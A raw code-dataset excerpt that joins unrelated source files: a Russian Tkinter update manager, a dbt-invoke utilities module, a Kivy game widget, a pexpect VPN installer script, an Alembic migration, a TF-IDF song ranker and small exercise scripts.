Toplevel()\r\n window_help.title(\"Справка\")\r\n window_help.wm_geometry(\"%dx%d+%d+%d\" % (625, 330, 0, 0))\r\n window_help = Label(window_help, text=reference, width=75, height=15, font=('Times', 12), bg='white')\r\n window_help.place(x=10, y=10)\r\n\r\n root = Tk()\r\n root.title(\"Администратор обновлений\")\r\n root.wm_geometry(\"%dx%d+%d+%d\" % (1130, 560, 0, 0))\r\n root.resizable(width=False, height=False)\r\n update_list_upd_button = Button(root, text=\"Обновить список доступных обновлений\", command=read_list_upd,\r\n activebackground='light blue', relief=GROOVE, fg=\"black\", font='times 11')\r\n update_list_upd_button.place(relx=0.83, rely=0.04, anchor=\"c\")\r\n update_list_upd_button.config(width=39)\r\n download_upd_button = Button(root, text=\"Скачать и установить обновление\", command=download_update,\r\n activebackground='light blue', relief=GROOVE, fg=\"black\", font='times 11')\r\n download_upd_button.place(relx=0.83, rely=0.1, anchor=\"c\")\r\n download_upd_button.config(width=39)\r\n auto_upd_button = Button(root, text=\"Автоматический поиск и установка\\n обновлений\", command=auto_install,\r\n relief=GROOVE, activebackground='light blue', font='times 11')\r\n auto_upd_button.place(relx=0.83, rely=0.22, anchor=\"c\")\r\n auto_upd_button.config(width=39)\r\n help_button = Button(root, text=\"Справка\", command=get_help, activebackground='light blue',\r\n relief=GROOVE, fg=\"black\", font='times 11')\r\n help_button.place(relx=0.79, rely=0.96, anchor=\"c\")\r\n help_button.config(width=15)\r\n btn_close = Button(root, text='Выход', relief=GROOVE, command=select_close,\r\n activeforeground='white', activebackground='#b20101', font='times 11')\r\n btn_close.place(relx=0.91, rely=0.96, anchor=\"c\")\r\n btn_close.config(width=15)\r\n scroll = Scrollbar(root)\r\n scroll.pack(side=LEFT, fill=Y)\r\n listbox = Listbox(root, width=75, height=25, yscrollcommand=scroll.set, font=('Courier', 12),\r\n selectbackground='light blue')\r\n status_bar = ttk.Progressbar(root, value=0, orient=\"horizontal\", mode=\"determinate\", length=300)\r\n status_bar.place(relx=0.83, rely=0.3, anchor=\"c\")\r\n listbox.place(x=14, y=10)\r\n scroll.config(command=listbox.yview)\r\n edit_menu = Menu(listbox, tearoff=0)\r\n edit_menu.add_command(label=\"Cut\", accelerator=\"Ctrl+X\", command=lambda: listbox.event_generate('<>'))\r\n edit_menu.add_command(label=\"Copy\", accelerator=\"Ctrl+C\", command=lambda: listbox.event_generate('<>'))\r\n edit_menu.add_command(label=\"Paste\", accelerator=\"Ctrl+V\", command=lambda: listbox.event_generate('<>'))\r\n listbox.bind(\"\", lambda event: edit_menu.post(event.x_root, event.y_root))\r\n\r\n read_list_upd()\r\n\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n \"\"\"Get settings\"\"\"\r\n parameters_ini = handling_settings.read_ini(parameters_file, 'utf-8')\r\n ini_file_cash_main = parameters_ini.get('Global', 'ini_file_cash_main')\r\n handling_settings.check_ini_file_on_duplicate_parameters(ini_file_cash_main, 'TerninalNumber')\r\n handling_settings.check_ini_no_valid_string(ini_file_cash_main)\r\n cash_ini = handling_settings.read_ini(ini_file_cash_main, 'cp1251')\r\n ftp_path_task = parameters_ini.get('Global', 'ftp_path_tasks')\r\n ftp_path_upd = parameters_ini.get('Global', 'ftp_path_upd')\r\n upd_path_in_flash = parameters_ini.get('Global', 'upd_path_in_flash')\r\n # handling_settings.check_ini_file_on_duplicate_parameters(ini_file_cash_main, 'TerninalNumber')\r\n # handling_settings.check_ini_no_valid_string(ini_file_cash_main)\r\n system_name = cash_ini.get('GLOBAL', 'TerninalNumber')\r\n\r\n bar = ProgressBar(maxval=80, widgets=['PROGRESS :', Percentage(), ' ', Bar(marker='#', left='[', right=']')],\r\n term_width=80).start()\r\n\r\n\r\n def auto_search(terminal):\r\n status_flash = check_flash_card_connection.search_flash(system_path_media, upd_path_in_flash)\r\n name_update = get_update_name(status_flash, system_name, ftp_path_task)\r\n\r\n if name_update:\r\n if not terminal:\r\n show_message(\"Установка обновления\", \"Найдено обновление\\n{}\\nУстановить?\".format(name_update))\r\n\r\n bar.update(20)\r\n download_arch_updates(status_flash, name_update, ftp_path_upd)\r\n bar.update(40)\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n bar.update(60)\r\n search_local_upd_for_install(status_flash, tmp_catalog_for_install_updates)\r\n bar.finish()\r\n else:\r\n if not terminal:\r\n show_message('Ошибка', 'Обновления не найдены')\r\n raise SystemExit(\"Обновления не найдены\")\r\n\r\n\r\n if os.path.exists('Log'):\r\n handling_logs.archiving_logs('Log')\r\n\r\n if os.path.exists(tmp_catalog_for_install_updates):\r\n logger.info('Found {}'.format(tmp_catalog_for_install_updates))\r\n shutil.rmtree(tmp_catalog_for_install_updates)\r\n logger.info('Remove {}'.format(tmp_catalog_for_install_updates))\r\n\r\n for file_log in os.listdir(path_to_install_CU):\r\n if not file_log.find('.log') == -1:\r\n os.system('rm /{}/{}'.format(path_to_install_CU, file_log))\r\n\r\n logger.info('Terminal Number ==> {}'.format(system_name))\r\n\r\n if key_parser.parse_args().list:\r\n console = True\r\n upd_list = []\r\n logger.info(\"Key {}\".format(namespace.list))\r\n ftp_list = FtpClient(ftp_path=ftp_path_upd)\r\n upd_comments = parameters_ini.get('Global', 'upd_comments')\r\n ftp_list.download_upd(upd_comments, ini=True)\r\n upd_comments = handling_settings.read_ini(upd_comments, 'cp1251')\r\n for upd_name in ftp_list.path_list:\r\n if upd_name.endswith('.zip') and upd_comments.has_option('Global', upd_name):\r\n logger.info(\"{} = {}\".format(upd_name, upd_comments.get('Global', upd_name)))\r\n upd_list.append((upd_name, upd_comments.get('Global', upd_name)))\r\n elif key_parser.parse_args().window:\r\n console = False\r\n gui_module()\r\n elif key_parser.parse_args().start_user:\r\n console = False\r\n auto_search(console)\r\n elif key_parser.parse_args().version:\r\n print(version)\r\n elif not namespace.update:\r\n console = True\r\n auto_search(console)\r\n else:\r\n logger.info(\"Key {}\".format(namespace.update))\r\n console = True\r\n check_flash = False\r\n update_name = [namespace.update]\r\n bar.update(20)\r\n download_arch_updates(check_flash, update_name, ftp_path_upd)\r\n bar.update(40)\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n bar.update(60)\r\n search_local_upd_for_install(check_flash, tmp_catalog_for_install_updates)\r\n bar.finish()\r\n\r\n except ConnectionError:\r\n show_message('Ошибка', 'Ошибка подключения к FTP-серверу.\\n\\n'\r\n 'Если вы хотите установить обновление с флеш-накопителя.Его необходимо смонтировать.')\r\n\r\n logger.exception('Ошибка подключения к FTP-серверу.\\n\\nЕсли вы хотите установить обновление с накопителя. '\r\n 'Его необходимо смонтировать.')\r\n except FileNotFoundError as error:\r\n show_message('Ошибка', 'На флеш-накопителе, не найден каталог с обновлениями.\\nПрограмма ищет их в каталоге {}'\r\n .format(parameters_ini.get('Global', 'upd_path_in_flash')))\r\n logger.exception('{}\\nНа флеш-накопителе, не найден каталог с обновлениями.Программа ищет их в каталоге{}'\r\n .format(error, parameters_ini.get('Global', 'upd_path_in_flash')))\r\n except Exception as error:\r\n show_message('Ошибка', 'Не известная ошибка\\n\\n {}'.format(error))\r\n logger.exception('Не известная ошибка:\\n{}'.format(error))\r\n except SystemExit as err:\r\n logger.error(err)\r\n","sub_path":"search_for_updates.py","file_name":"search_for_updates.py","file_ext":"py","file_size_in_byte":35736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30921363","text":"import string\r\n\r\ncount = 0\r\ns = input('Enter a string: ').lower()\r\nli = [0] * 26\r\nfor i in s:\r\n if i in string.ascii_letters:\r\n li[ord(i) - 97] += 1\r\n\r\nprint(li)\r\n\r\nfor i in li:\r\n if i == 0:\r\n print('Not Pangram')\r\n break\r\nelse:\r\n print('Pangram')\r\n\r\n#Enter a string: A quick brown fox jumps over the lazy dog","sub_path":"Python_code/Pangram.py","file_name":"Pangram.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"193184035","text":"import json\nimport logging\nfrom pathlib import Path\nimport sys\n\nimport yaml\n\nfrom dbt.task.base import get_nearest_project_dir\n\nMACROS = {\n '_log_columns_list': (\n \"\\n{# This macro is intended for use by dbt-invoke #}\"\n \"\\n{% macro _log_columns_list(sql=none, resource_name=none) %}\"\n \"\\n {% if sql is none %}\"\n \"\\n {% set sql = 'select * from ' ~ ref(resource_name) %}\"\n \"\\n {% endif %}\"\n \"\\n {% if execute %}\"\n \"\\n {{ log(get_columns_in_query(sql), info=True) }}\"\n \"\\n {% endif %}\"\n \"\\n{% endmacro %}\\n\"\n )\n}\nDBT_LS_ARG_HELP = (\n 'An argument for listing dbt resources (run \"dbt ls --help\" for details)'\n)\nDBT_LS_ARGS = {\n 'resource_type': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'select': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'models': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'exclude': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'selector': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'project_dir': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'profiles_dir': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'profile': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'target': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'vars': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'bypass_cache': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'state': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n}\n\n\ndef get_logger(name, level='INFO'):\n \"\"\"\n Create a logger\n\n :param name: The name of the logger to create\n :param level: One of Python's standard logging levels\n (DEBUG, INFO, WARNING, ERROR, CRITICAL)\n :return: A logging.Logger object\n \"\"\"\n logger = logging.getLogger(name)\n if logger.hasHandlers():\n logger.handlers.clear()\n handler = logging.StreamHandler(stream=sys.stdout)\n formatter = logging.Formatter(\n '{name} | {levelname:^8} | {message}', style='{'\n )\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(level.upper())\n return logger\n\n\ndef parse_yaml(location):\n \"\"\"\n Parse a yaml file\n\n :param location: The location of the yaml file to parse\n :return: The contents of the yaml file\n \"\"\"\n with open(location, 'r') as stream:\n try:\n parsed_yaml = yaml.safe_load(stream)\n return parsed_yaml\n except yaml.YAMLError as exc:\n sys.exit(exc)\n\n\ndef write_yaml(location, data):\n \"\"\"\n Write a yaml file\n\n :param location: The location to which to write the yaml file\n :param data: The object which will be written to the yaml file\n :return: None\n \"\"\"\n try:\n with open(location, 'w') as stream:\n yaml.safe_dump(data, stream, sort_keys=False)\n except yaml.YAMLError as exc:\n sys.exit(exc)\n\n\ndef get_project_info(ctx, project_dir=None):\n \"\"\"\n Get project level configurations for a dbt project\n and store them in ctx (an Invoke context object)\n\n :param ctx: An Invoke context object\n :param project_dir: A directory containing a dbt_project.yml file\n :return: None\n \"\"\"\n project = Project(project_dir)\n project_path = get_nearest_project_dir(project)\n project_yml_path = Path(project_path, 'dbt_project.yml')\n # Get project configuration values from dbt_project.yml\n # (or use dbt defaults)\n project_yml = parse_yaml(project_yml_path)\n project_name = project_yml.get('name')\n target_path = Path(project_path, project_yml.get('target-path', 'target'))\n compiled_path = Path(target_path, 'compiled', project_name)\n macro_paths = [\n Path(project_path, macro_path)\n for macro_path in project_yml.get('macro-paths', ['macros'])\n ]\n # Set context config key-value pairs\n ctx.config['project_path'] = project_path\n ctx.config['project_name'] = project_name\n ctx.config['target_path'] = target_path\n ctx.config['compiled_path'] = compiled_path\n ctx.config['macro_paths'] = macro_paths\n\n\ndef dbt_ls(\n ctx,\n supported_resource_types=None,\n hide=True,\n output='path',\n logger=None,\n **kwargs,\n):\n \"\"\"\n Run the \"dbt ls\" command with options\n\n :param ctx: An Invoke context object\n :param supported_resource_types: A list of supported resource types\n to default to if no resource selection arguments are given\n (resource_type, select, models, exclude, selector)\n :param hide: Whether to suppress command line logs\n :param output: An argument for listing dbt resources\n (run \"dbt ls --help\" for details)\n :param logger: A logging.Logger object\n :param kwargs: Additional arguments for listing dbt resources\n (run \"dbt ls --help\" for details)\n :return: A list of lines from stdout\n \"\"\"\n if not logger:\n logger = get_logger('')\n resource_selection_arguments = {\n arg: kwargs.get(arg)\n for arg, details in DBT_LS_ARGS.items()\n if details['resource_selector']\n }\n # Use default arguments if no resource selection arguments are given\n default_arguments = list()\n if not any(resource_selection_arguments.values()):\n default_arguments.append(f'--select {ctx.config[\"project_name\"]}')\n if supported_resource_types:\n for rt in supported_resource_types:\n default_arguments.append(f'{get_cli_kwargs(resource_type=rt)}')\n default_arguments = ' '.join(default_arguments)\n arguments = get_cli_kwargs(**kwargs)\n all_arguments = f'{default_arguments} {arguments} --output {output}'\n command = f\"dbt ls {all_arguments}\"\n logger.debug(f'Running command: {command}')\n result = ctx.run(command, hide=hide)\n result_lines = result.stdout.splitlines()\n if output == 'json':\n result_lines = [\n json.loads(result_json) for result_json in result_lines\n ]\n return result_lines\n\n\ndef get_cli_kwargs(**kwargs):\n \"\"\"\n Transform Python keyword arguments to CLI keyword arguments\n\n :param kwargs: Keyword arguments\n :return: CLI keyword arguments\n \"\"\"\n return ' '.join(\n [\n f'--{k.replace(\"_\", \"-\")} {str(v).replace(\",\", \" \")}'\n for k, v in kwargs.items()\n if v\n ]\n )\n\n\ndef dbt_run_operation(\n ctx,\n macro_name,\n project_dir=None,\n profiles_dir=None,\n profile=None,\n target=None,\n vars=None,\n bypass_cache=None,\n hide=True,\n logger=None,\n **kwargs,\n):\n \"\"\"\n Perform a dbt run-operation\n (see https://docs.getdbt.com/reference/commands/run-operation/)\n\n :param ctx: An Invoke context object\n :param macro_name: Name of macro that will be run\n :param project_dir: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param profiles_dir: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param profile: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param target: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param vars: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param bypass_cache: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param hide: Whether to suppress command line logs\n :param logger: A logging.Logger object\n :param kwargs: Arguments for defining macro's parameters\n :return: stdout in list where each item is one line of output\n \"\"\"\n if not logger:\n logger = get_logger('')\n dbt_kwargs = {\n 'project_dir': project_dir or ctx.config['project_path'],\n 'profiles_dir': profiles_dir,\n 'profile': profile,\n 'target': target,\n 'vars': vars,\n 'bypass_cache': bypass_cache,\n }\n dbt_cli_kwargs = get_cli_kwargs(**dbt_kwargs)\n macro_kwargs = json.dumps(kwargs, sort_keys=False)\n command = (\n f\"dbt run-operation {dbt_cli_kwargs}\"\n f\" {macro_name} --args '{macro_kwargs}'\"\n )\n logger.debug(f'Running command: {command}')\n result = ctx.run(command, hide=hide)\n result_lines = result.stdout.splitlines()[1:]\n return result_lines\n\n\ndef get_macro(macro_name):\n \"\"\"\n Get the configured macro\n\n :param macro_name: The name of the macro to add\n :return: The macro itself in string form\n \"\"\"\n return MACROS[macro_name]\n\n\ndef macro_exists(ctx, macro_name, logger=None, **kwargs):\n \"\"\"\n Check if a given macro name exists in the dbt project\n\n :param ctx: An Invoke context object\n :param macro_name: The name of the macro to check for\n :param logger: A logging.Logger object\n :param kwargs: Additional arguments for dbt_run_operation\n :return: True if the macro exists, else False\n \"\"\"\n if not logger:\n logger = get_logger('')\n try:\n dbt_run_operation(\n ctx,\n macro_name,\n logger=logger,\n sql=f'SELECT 1 AS __dbt_invoke_check_macro_{macro_name} LIMIT 0',\n **kwargs,\n )\n except Exception as exc:\n if all(\n [\n s in str(exc).lower()\n for s in ['runtime error', 'not', 'find', macro_name]\n ]\n ):\n return False\n else:\n logger.exception(exc)\n return True\n\n\ndef add_macro(ctx, macro_name, logger=None):\n \"\"\"\n Add a macro to a dbt project if the user confirms\n\n :param ctx: An Invoke context object\n :param macro_name: The name of the macro to add\n :param logger: A logging.Logger object\n :return: None\n \"\"\"\n if not logger:\n logger = get_logger('')\n location = Path(ctx.config['macro_paths'][0], f'{macro_name}.sql')\n logger.warning(\n f'This command requires the following macro:'\n f'\\n{get_macro(macro_name)}'\n )\n question = (\n f'Would you like to add the macro \"{macro_name}\"'\n f' to the following location?:\\n{location}'\n )\n prompt = (\n 'Please enter \"y\" to confirm macro addition,'\n ' \"n\" to abort,'\n ' or \"a\" to provide an alternate location.'\n )\n add_confirmation = input(f'{question}\\n{prompt}\\n')\n while add_confirmation.lower() not in ['y', 'n', 'a']:\n add_confirmation = input(f'{prompt}\\n')\n if add_confirmation.lower() == 'n':\n logger.info('Macro addition aborted.')\n sys.exit()\n elif add_confirmation.lower() == 'a':\n alternate_prompt = (\n 'Please enter a path (ending in \".sql\")'\n ' to a new or existing macro file'\n ' in one of your existing dbt macro-paths.\\n'\n )\n location = Path(input(alternate_prompt))\n absolute_macro_paths = [\n mp.resolve() for mp in ctx.config['macro_paths']\n ]\n while (\n location.parent.resolve() not in absolute_macro_paths\n or location.suffix.lower() != '.sql'\n ):\n if location.parent.resolve() not in absolute_macro_paths:\n not_a_macro_path = (\n f'{location.parent.resolve()}'\n f' is not an existing macro path.'\n )\n existing_macro_paths_are = 'Your existing macro paths are:'\n existing_macro_paths = \"\\n\".join(\n [str(mp) for mp in absolute_macro_paths]\n )\n logger.warning(\n f'{not_a_macro_path}'\n f'\\n{existing_macro_paths_are}'\n f'\\n{existing_macro_paths}'\n )\n if location.suffix.lower() != '.sql':\n logger.warning('File suffix must be \".sql\".')\n location = Path(input(alternate_prompt))\n with location.open('a') as f:\n f.write(f'{get_macro(macro_name)}')\n logger.info(f'Macro \"{macro_name}\" added to {location.resolve()}')\n\n\nclass Project:\n \"\"\"\n A placeholder class for use with get_nearest_project_dir\n \"\"\"\n\n def __init__(self, project_dir=None):\n \"\"\"\n Initialize a Project object\n\n :param project_dir:\n \"\"\"\n self.project_dir = project_dir\n","sub_path":"dbt_invoke/internal/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":12373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451357931","text":"import csv\r\nimport sys\r\n\r\n#read_csv function accepts a file name, and parses it with the file handle being returned to the invoking function\r\ndef read_csv(file_name):\r\n\tfile_handle = open(file_name,\"r\")\r\n\tprint (file_name)\r\n\tcsv_lines = csv.reader (file_handle)\t\t#csv.reader is used to read a csv file\r\n\treturn csv_lines\r\n\r\ndef print_csv(csv_data):\r\n\tfor line in csv_data:\r\n\t\tprint (line)\r\n\t\r\n\t\r\nif __name__ == \"__main__\":\r\n\tfile_name = sys.argv[1]\r\n\ttry:\r\n\t\tif len(sys.argv) > 0:\r\n\t\t\tcsv_data = read_csv (file_name)\t\t\t\t# Exception handling to be performed over predicted failure points. Use Try for risky statements\r\n\t\telse:\r\n\t\t\tcsv_data = read_csv (\"population.csv\")\r\n\texcept IOError:\t\t\t\t\t\t\t\t\t\t\t# 'except' command to handle the exception. But type of exception also has to be specified\r\n\t\tprint (\"Could not open file. Please check your file name!\")\r\n\telse:\r\n\t\tprint_csv(csv_data)\r\n\tfinally:\r\n\t\tprint (\"We're all done here!\")","sub_path":"pop_census.py","file_name":"pop_census.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"250069429","text":"from kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom widgets.HealthBar import HealthBar\n\n\nclass Game(BoxLayout):\n def __init__(self, socket, **kwargs):\n super(Game, self).__init__(**kwargs)\n self.orientation = \"vertical\"\n\n self.full_answer = Label(font_size=30)\n self.number_grid = GridLayout(cols=3)\n self.hud = BoxLayout(spacing=2, size_hint=(1, 0.3))\n\n for text in range(1, 10):\n self.number_grid.add_widget(Button(text=str(text), on_press=self.add_number))\n\n self.number_label = Label(text=\"\", font_size=29)\n\n self.health = HealthBar(3)\n self.hud.add_widget(self.health)\n\n self.add_widget(self.hud)\n self.add_widget(self.full_answer)\n\n self.add_widget(self.number_label)\n answer_input = BoxLayout(orientation=\"horizontal\")\n\n answer_input.add_widget(self.number_grid)\n manipulation_buttons = BoxLayout(orientation=\"vertical\", size_hint=(0.3, 1))\n\n manipulation_buttons.add_widget(Button(text=\"<=\", on_press=self.pop_number))\n self.client_socket = socket\n\n self.send_button = Button(text=\"Send\", on_press=self.send_number)\n manipulation_buttons.add_widget(self.send_button)\n\n answer_input.add_widget(manipulation_buttons)\n self.add_widget(answer_input)\n\n def pop_number(self, _):\n try:\n self.number_label.text = self.number_label.text[:len(self.number_label.text) - 1]\n\n except IndexError:\n pass\n\n def add_number(self, instance):\n self.number_label.text += instance.text\n\n def get_answer(self):\n return self.full_answer.text\n\n def send_number(self, _):\n self.client_socket.send(self.number_label.text.encode(\"utf-8\"))\n self.number_label.text = \"\"\n","sub_path":"widgets/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"312165343","text":"# 런타임 => 시간초과 => 해결 ㅠㅠ!\nfrom sys import stdin\nfrom collections import deque\n\nfor _ in range(int(stdin.readline())):\n string = stdin.readline().strip()\n cusor, cusor_len = 0, 0\n ans = deque()\n for s in string:\n # print(cusor)\n if s == '-':\n if cusor:\n del ans[cusor-1]\n cusor -= 1\n cusor_len -= 1\n elif s == '<':\n if cusor:\n cusor -= 1\n elif s == '>':\n if cusor < cusor_len:\n cusor += 1\n else:\n ans.insert(cusor, s)\n cusor += 1\n cusor_len += 1\n print(''.join(ans))\n\n'''\n1. 위 내가 푼 방법은 처음에 런타임 에러를 내면서 끝났다.\n- cusor를 이동하면서 주어진 조건에 맞게 입력했다고 생각했는데\n- 출력값은 나왔지만 어딘가 문제가 있는 코드인 것 같다.\n- 시간적으로도 불안하기는 했다.(수정했더니 시간초과...)\n\n2. 코드 개선하여 해결함\n- 시간 부족한 문제는 2가지로 해결 \n - stdin.readline()으로\n - list대신 deque()로\n- 런타임에러의 경우\n - 조건을 조금 수정함\n - '-'일 경우 삭제후, cursor를 앞으로 한칸 이동시켜주고, 총길이도 줄여준다.\n - cusor가 이동한 거리(cusor_len)을 생각 못했던 점이 error의 원인이었지 않나 싶다.\n\n3. 키로거 문제의 핵심은\n- 커서를 중심으로 좌, 우를 두고 생각해야한다는 점이다. \n- '-'일 때, 좌측에 값이 있다면 pop()해서 제거\n- '<'일 때, 좌측에 값이 있다면 좌측에서 pop()한 값을 오른쪽에 붙이기\n- '>'일 때, 오른쪽에 값이 있다면 우측에서 pop()한 값을 왼쪽에 붙이기.\n- 나머지 문자일 경우, 좌측에 붙여주기\n\n- 입력 받은 문자열 순회가 끝나면\n - 오른쪽 결과는 역순이므로 reverse를 해주어야 한다.\n - 왼쪽에서 확장해서 오른쪽 결과를 붙여주기.\n- 출력\n\n4. 총정\n- 양방향 스택을 생각 못해냈는데, 다른 문제에도 접목할 수 있을 것 같다. 잘기억하자.\n- 속도, 공간 문제가 생기면 꼭 stdin, deque등을 떠올려보자 해결 할 수도..!\n \n'''\n","sub_path":"python/BOJ/02_스택/BOJ5397_키로거.py","file_name":"BOJ5397_키로거.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"294822388","text":"#!/usr/bin/env python3\n\nimport pexpect\nimport os\nimport sys\n\ntimeout = 20*60\n\nif len(sys.argv) != 2:\n print('Name of directory with rockhopper source is required!')\n sys.exit(5)\n\nos.chdir(sys.argv[1])\n\nlogfile = open('logfile.log', 'ab')\n\nchild = pexpect.spawn('./install.sh 2>/dev/null')\nchild.logfile = logfile\n\nwhile True:\n i = child.expect([\"Push \", # 0\n \"Do you want to overwrite the old installation anyway?\", # 1\n \"Rockhopper was successfully installed\", # 2\n \"Do you want to try installation of the package now?\", # 3\n \"Do you want to continue?\", # 4\n pexpect.TIMEOUT, # 5\n pexpect.EOF, # 6\n \"\\[Y/n\\]\", # 7\n ], timeout=timeout)\n if i == 0:\n child.send(\"\\n\")\n elif i == 1:\n child.send(\"y\\n\")\n elif i == 2:\n print('Rockhopper was successfully installed')\n logfile.close()\n sys.exit(0)\n elif i == 3:\n child.send(\"y\\n\")\n elif i == 4:\n child.send(\"y\\n\")\n elif i == 5:\n print('TIMEOUT')\n logfile.close()\n sys.exit(0)\n elif i == 6:\n print('EOF')\n logfile.close()\n sys.exit(0)\n elif i == 7:\n child.send(\"\\n\")\n\n","sub_path":"mko-vps/roles/vpn_server/files/expect_rockhopper.py","file_name":"expect_rockhopper.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"597606486","text":"import csv\nimport re\nimport math\nimport sys\nfrom collections import Counter\n\n#Read the information from file\nwith open (\"../data/cleaned_songtitles.txt\") as f:\n\tr = csv.reader(f, delimiter='|', quoting=csv.QUOTE_NONE)\n\t#Regular expression doesn't include numbers or foreign characters\n\trgx = re.compile(r'\\b[a-zA-Z]+\\b')\n\tdocs = [ (' '.join(re.findall(rgx, x[1])).lower(), ' '.join(re.findall(rgx, x[2])).lower(), \\\n\t\t''.join(x[1]), ''.join(x[2])) for i,x in enumerate(r) if i > 1 ]\n\n\n#Collections\nsongs_a = [ d[0] for d in docs ] #Author's name \norg_songs_a = [d[2] for d in docs ] #This is the de-normalized Author's name\nsongs_t = [ d[1] for d in docs ] #Title of the song\norg_songs_t = [d[3] for d in docs ] #De-normalized Title of the song\nsongs_i = range(0, len(songs_a)) #Index of the song in corpus\n\n#Helper function to pprint results - adapted from Lecture CST 495 Matt Gardner\ndef print_results(results, n, head=True):\n\tif head: \n\t\tprint(\"\\nTop %d from recall set of %d items:\" % (n, len(results)))\n\t\tfor r in results[:n]:\n\t\t\tprint (\"\\t%0.2f - %s by %s\" % (r[0], org_songs_t[r[1]], org_songs_a[r[1]]))\n\n#Create the inverted index matrix - adapted from Lecture CST 495 Matt Gardner\ndef create_inverted_index(corpus):\n\tidx = {}\n\tfor i, doc in enumerate(corpus):\n\t\tfor word in doc.split():\n\t\t\tif word in idx:\n\t\t\t\tif i in idx[word]:\n\t\t\t\t\tidx[word][i] += 1\n\t\t\t\telse:\n\t\t\t\t\tidx[word][i] = 1\n\t\t\telse:\n\t\t\t\tidx[word] = {i:1}\n\treturn idx\n\n#Get the idf - adapted from Lecture CST 495 Matt Gardner\ndef idf(term, idx, n):\n\treturn math.log( float(n) / (1 + len(idx[term])))\n\n#Accepts the query, inverted index, and n <- n = initial size of corpus\n#Returns the resulting scores - adapted from Lecture CST 495 Matt Gardner\ndef get_results_tfidf(qry, idx, n):\n\tscore = Counter()\n\tfor term in qry.split():\n\t\tif term in idx:\n\t\t\ti = idf(term, idx, n)\n\t\t\tfor doc in idx[term]:\n\t\t\t\tscore[doc] += idx[term][doc] * i\n\n\tresults = []\n\tfor x in [[r[0],r[1]] for r in zip(score.keys(), score.values())]:\n\t\tif x[1] > 0:\n\t\t\tresults.append([x[1],x[0]])\n\n\tsorted_results = sorted(results, key = lambda t: t[0] * -1)\n\treturn sorted_results\n\n\n#Inverted index \n#Get the results based on input from command line\nidx = create_inverted_index(songs_t)\nresults = get_results_tfidf(sys.argv[1], idx, len(songs_i))\nprint_results(results, 10)\n\n","sub_path":"rankers/ranker.py","file_name":"ranker.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"187834873","text":"\"\"\"Add QuestionComment model.\n\nRevision ID: 36d6b61d3bce\nRevises: 41e2fee079b\nCreate Date: 2015-05-30 15:41:42.216987\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '36d6b61d3bce'\ndown_revision = '41e2fee079b'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('question_comment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.Text(), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('question_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['question_id'], ['question.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('question_comment')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/20150530154142_36d6b61d3bce_add_questioncomment_model.py","file_name":"20150530154142_36d6b61d3bce_add_questioncomment_model.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214425853","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/04/10 ##\n## Description: Leetcode #100 ##\n##############################################\n\n# Given two binary trees, write a function to check if they are the same or not.\n# \n# Two binary trees are considered the same if they are structurally identical and the nodes have the same value.\n# \n# \n# Example 1:\n# \n# Input: 1 1\n# / \\ / \\\n# 2 3 2 3\n# \n# [1,2,3], [1,2,3]\n# \n# Output: true\n# Example 2:\n# \n# Input: 1 1\n# / \\\n# 2 2\n# \n# [1,2], [1,null,2]\n# \n# 